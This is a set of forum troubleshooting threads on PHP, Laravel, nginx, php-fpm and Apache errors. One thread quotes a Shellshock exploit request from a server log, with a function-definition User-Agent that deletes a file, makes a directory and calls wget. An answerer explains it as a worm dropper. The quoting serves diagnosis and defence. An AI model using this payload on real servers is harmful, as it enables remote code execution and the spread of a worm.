This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows up blank and the console says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view, which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2, and PHP 5.4.
Does anybody know how I can fix this?
Had the same problem on an Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 app that one day suddenly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked the nginx lib directory permissions on my Vagrant box with ll /var/lib/:
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... which internally uses the www-data user (ll /var/lib/nginx/):
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
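To double-check that the fix took, re-list the directory; both owner and group should now be www-data:
ls -ld /var/lib/nginx/fastcgi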
Just posting the solution here for visibility; all the credit should go to the linked original comment.
I had the exact same problem you have. I found a workaround in this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code from the person who provided the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to explicitly tell Chrome how much data to expect for every request, so the response doesn't have to be chunked.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
    // Fixes a strange issue with Chrome. Should theoretically be removable
    // after upgrading PHP from 5.4 to 5.5.
    if ($response instanceof Illuminate\Http\Response) {
        $response->header('Content-Length', strlen($response->getOriginalContent()));
    }
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.
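If you do need to cover JSON responses as well, a variation along these lines might work (an untested sketch: it uses the Symfony headers bag, which both response classes expose, and measures the rendered body via getContent()):
App::after(function($request, $response) {
    // Untested sketch: also cover JSON responses by measuring the rendered
    // body instead of the original content.
    if ($response instanceof Illuminate\Http\Response ||
        $response instanceof Illuminate\Http\JsonResponse) {
        $response->headers->set('Content-Length', strlen($response->getContent()));
    }
});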
I have a php docker app running with multiple containers such as
j_php-fpm_1 and j_nginx_1
j_php-fpm_1 is the container with the whole project (Magento / php but that's not relevant here).
My issue is the following:
At some point in the app I trigger "A technical problem with the server created an error. Try again to continue what you were doing. If the problem persists, try again later.", which means I have a server error in my PHP even before entering the framework.
So I went into my j_php-fpm_1 container, but the log file can't be read due to a permission error:
make bash
docker-compose exec -u magento php-fpm bash
magento#315933593d37:/var/www/magento$ ls -al /var/log/php7.3-fpm.log
-rw------- 1 root root 0 Jan 3 10:04 /var/log/php7.3-fpm.log
magento#315933593d37:/var/www/magento$ cat /var/log/php7.3-fpm.log
cat: /var/log/php7.3-fpm.log: Permission denied
Then I tried to check the live nginx logs
docker logs j_nginx_1
As a result I see the request that triggers the error, but still no error printed in the log:
172.21.0.1 - - [05/Jan/2022:15:22:34 +0000] "POST /admin_sdj/sponsorship/index/sponsorship/key/d81ba9d66a439a3fe7a2e70e9567830be8b3a1cef39f8984002129045622fb59/id/1/?isAjax=true HTTP/1.1" 200 190 "http://j.dev-cpy.fr/admin_sdj/customer/index/edit/id/1/key/05dae1e3543127f8c02295e29b06b70722d085f69a37b0d7155fc257ce6b1257/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
The access log and error log from the nginx container are empty.
Any ideas where I can find my error log?
PS: I can't change the php-fpm log file permissions.
EDIT: Connecting as root with docker exec -it --user root j_php-fpm_1 /bin/bash shows the fpm log file is empty too.
I don't know where to look anymore.
I found my error's origin; it was actually due to a wrong URL path triggering a 404 error... which then triggered the server error in a subsequent request. Still no idea about the logs, but at least my issue is solved for now. I'll leave the topic open in case someone has an idea.
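On the logging question: one common approach (it is what the official php-fpm Docker images do) is to point FPM's logs at the container's stderr, so they show up in docker logs j_php-fpm_1 instead of a root-owned file. Roughly, in the FPM configuration (the exact file path depends on the image; for Debian-style packages it lives under /etc/php/7.3/fpm/):
[global]
; send the FPM master error log to the container's stderr
error_log = /proc/self/fd/2

[www]
; forward the workers' stdout/stderr (PHP fatals, etc.) there as well
catch_workers_output = yes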
Today I ran into a strange problem:
Our project needed to bring a new module online.
When I executed artisan down in the production environment and visited the site, it didn't show the maintenance page; it still showed the home page.
I checked that the CheckForMaintenanceMode middleware is already added to the global route middleware, and the down file in storage/framework exists.
When I execute php index.php it returns the maintenance page, but when I visit the site from a browser or curl it shows the home page.
I also ran it on the test server and locally, and there it all works fine.
I added a new route to test the middleware and visited the URL with curl and a browser; the result was a 404, the route was not found.
I thought it might be caused by the route cache, but there is no cache file in bootstrap/cache or storage/framework, because I never enabled the route cache!
Out of ideas, I modified the index file, added a header() redirect to an error HTML page at the top, and the crazy thing is it still showed the home page!
What happened? I'm sure the project path is right.
Finally I reloaded php-fpm and everything returned to normal: the maintenance view works, the redirect works, and the routes behave normally.
I still don't understand it, but I guess it may be caused by opcache?
I have the opcache extension enabled with the default settings.
env:
laravel: 5.3
nginx: 1.8.1
php-fpm: 7.0.9 with opcache ext
First check your FPM logs; usually something like this will pop up between the notices (check your debug/log levels):
[01-Mar-2017 23:59:45] NOTICE: [pool www] child 16951 started
[01-Mar-2017 23:59:48] WARNING: [pool www] child 14754
exited on signal 11 (SIGSEGV - core dumped) after 4393.427133 seconds
from start
Unfortunately, you have to disable opcache. I've been seeing this issue from PHP 5.5 all the way to 7.1. You will also find entries like these in the error logs:
2017/03/02 10:00:24 [error] 30498#30498: *170523 upstream timed out
(110: Connection timed out) while reading response header from upstream,
client: 81.243.144.1xx, server: fake.test.pro,
request: "POST /api/users/53e4203cfd1c46e08d5b570c2c93ff86/items HTTP/1.1",
upstream: "fastcgi://unix:/var/run/php/php7.0-fpm.sock", host: "fake.test.pro",
referrer: "http://fake.test.pro/console"
I see it in particular with Laravel, but I've also seen it on WordPress installations. It stops when I disable opcache, on all versions of php-fpm.
There are bug reports around on this issue but no fixes so far. I always end up doing this:
[opcache]
; Determines if Zend OPCache is enabled
opcache.enable=0
in the /etc/php/7.*/fpm/php.ini files. Then my application is robust again and it costs us 150 ms. It sucks.
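If disabling opcache outright is too expensive, an alternative worth trying is to flush the cache on every deploy instead, either by reloading php-fpm (which is what fixed things for the asker above) or with a small script requested through FPM. A minimal sketch (opcache_reset() only clears the cache of the SAPI it runs in, so it has to go through FPM, not the CLI):
<?php
// opcache-clear.php -- restrict access to this before putting it on a live server,
// then request it once through php-fpm after each deploy.
if (function_exists('opcache_reset') && opcache_reset()) {
    echo "opcache cleared\n";
} else {
    echo "opcache not enabled or reset failed\n";
}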
Hi Friends,
I am using the Ampps server with PHP 5.3.29 on Windows Server Datacenter.
Unfortunately I am getting the following prompt on the Windows server and my site goes down.
Prompt title:
Microsoft Windows
Prompt message:
Apache HTTP Server has stopped working.
A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
Trace:
When I traced the error and access logs, I found the following entries as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a web bot trying to gain access so it can wget and execute something like S0.sh, which I imagine is a worm, so the download server is compromised.
I'd like a copy of S0.sh; if you happen to get one, give it to exploit-db or somewhere similar.
The clever command is:
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The log shows that the file does not exist, as indicated by the 404 status and the message "script not found".
Finally, I denied those clients access to the cgi-bin directory.
In the cgi-bin directory I created a .htaccess file.
I added the following line to the .htaccess:
Deny from all
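For reference, the exact directives depend on your Apache version; a cgi-bin/.htaccess along these lines should cover it:
# Apache 2.2 syntax
Order deny,allow
Deny from all

# Apache 2.4 syntax (mod_authz_core)
# Require all denied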
I don't think authLogin.cgi really matters, other than that it might allow someone to execute code. The problem is that the attacker tries to (or successfully does) remove /tmp/S0.sh, make a php directory in the share folder, and then execute wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this in action; initially no one knew to call it Shellshock. There is a copy of S0.sh there, and you can see it's a worm, as I presumed.
From what I read, the worm just crawls the IP space looking for anything listening on port 8080.
I had a LAMP application running WordPress; I deleted the whole directory and replaced it with new PHP-based files.
Now, when I go to view my site on the CentOS server, it just shows a 500 Internal Server Error.
I've tried:
restarting the server
restarting the Apache service itself
Both completed successfully, but this didn't fix anything. Now I do not know where to go from here.
Apache error log (/usr/local/apache/logs/error_log):
[Tue Apr 22 11:12:15 2014] [error] [] SoftException in Application.cpp:357: UID of script "index.php" is smaller than min_uid
I found the fix myself; this wasn't an error with MySQL at all, but rather a permissions issue with my index.php file.
The error, which I found in /usr/local/apache/logs/error_log was:
:is smaller than min_uid Premature end of script headers: index.php
To fix, I did this:
Run ls -l in the directory causing the issue (mine was public_html).
You should see the index file (e.g. index.php) that is causing the issue. The problem is that the file is owned by root rather than your cPanel (or system) user. (Note this system/cPanel username.)
Run the following within the erroneous directory (note: this command must also be run within all subdirectories of the primary erroneous directory):
sudo chown yoursystemuserhere:yoursystemgroupuserhere index.php
or to apply to the whole directory (thanks to #Prix):
sudo chown -R user:group /folder
You're all set.
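If you're not sure which files are still owned by root, something like this will list them (replace youruser with your actual system/cPanel user and adjust the path):
find /home/youruser/public_html ! -user youruser -ls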
Further literature here: http://www.inmotionhosting.com/support/website/general-server-setup/uid-smaller-than-min-uid
I hope this helps someone else in the future.
I had similar symptoms on my cPanel VPS - I was able to use easyApache to recompile Apache and PHP which fixed the problem for me.
(I realise my problem was slightly different to yours, but it may be helpful for people in the future who have the same problem I had).
chown -R user:usergroup /path_to_the_directory
will resolve this. It is basically a permissions issue.
Just install the latest WordPress version, make sure you have at least PHP 5.3, and check whether register_globals is off; or just delete the .htaccess file from the server and see what happens.
Generally a 500 Internal Server Error occurs when file permissions are wrong, so you could try deleting the .htaccess file.